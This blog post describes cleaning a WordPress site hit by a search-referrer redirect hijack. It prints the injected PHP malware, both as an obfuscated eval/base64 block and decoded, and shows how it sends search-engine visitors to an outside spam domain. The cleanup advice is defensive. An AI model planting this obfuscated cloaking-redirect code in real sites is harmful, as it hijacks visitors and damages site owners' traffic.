WordPress Search Redirect Hijack

I recently had the opportunity to work with a friend on fixing a WordPress installation (version 3.5.1) that every time the page was accessed via a search engine it would redirect to a generic site, in this case http://kmlps.mrslove.com/.

This hijack consisted of PHP code being inserted into the various WordPress and plugin PHP files.

Here is the code that was injected into all of the pages.

<?php
eval(base64_decode(CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio));
?>

This is simply a base64 encoded block of PHP code that is decoded then evaluated by the PHP processor when the page loads. When you decode the text, you can see exactly what the code does.

<?php
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
	$referer=$_SERVER['HTTP_REFERER'];
	$uag=$_SERVER['HTTP_USER_AGENT'];
	if ($uag) {
		if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
			if (stristr($referer,"yahoo") 
				or stristr($referer,"bing") 
				or stristr($referer,"rambler") 
				or stristr($referer,"gogo") 
				or stristr($referer,"live.com")
				or stristr($referer,"aport") 
				or stristr($referer,"nigma") 
				or stristr($referer,"webalta") 
				or stristr($referer,"begun.ru") 
				or stristr($referer,"stumbleupon.com") 
				or stristr($referer,"bit.ly") 
				or stristr($referer,"tinyurl.com") 
				or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) 
				or preg_match ("/google\.(.*?)\/url\?sa/",$referer) 
				or stristr($referer,"myspace.com") 
				or stristr($referer,"facebook.com") 
				or stristr($referer,"aol.com")) {
				if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
					header("Location: http://kmlps.mrslove.com/");
					exit();
				}
			}
		}
	}
}
?>

As you can see with the code, if the HTTP Referrer is any of a slew of websites/search engines, then the code will redirect the user to the specific location using a 301 redirect. This allows a user to access the site directly, but not through many search engines. This will definitely cause a lot of problems for a website that gets most of its traffic from search engines.

The Fix

I was able to fix the issue by copying all of the WordPress files off of the server, and removing the code from each of the files.

NOTE: Windows Defender picked up the bad code in the PHP files and quarantined them. If this happens for you, you will have to pull the files out of quarantine before you can edit them.

After you have the files copied over and are able to edit them, it’s simply a matter of removing the bad code. Once the code is removed, re-upload them to the server. This is a bit laborious, but it definitely gets the job done. Just make sure you don’t miss any files, otherwise the problem will persist.

One of the better, and probably more thorough way to clean up the issue would be to upgrade/re-install the version of WordPress that you are using. This can be done through the built in WordPress Updates processes. The update will replace the bad files with clean versions. As always, make sure you make a backup before doing any major upgrades, etc.

Another option would be to restore the files from a backup. Since the database didn’t seem to be affected, simply performing a content restore from a backup would also have corrected the issue.

Bottom line, you should always make sure you are staying on top of updates for content management systems like WordPress, Joomla, etc. And you should make sure that your FTP accounts, etc. all have solid passwords. It will save you a lot of headache, and possibly a lot of lost business down the road.

Leave a Reply

Your email address will not be published. Required fields are marked *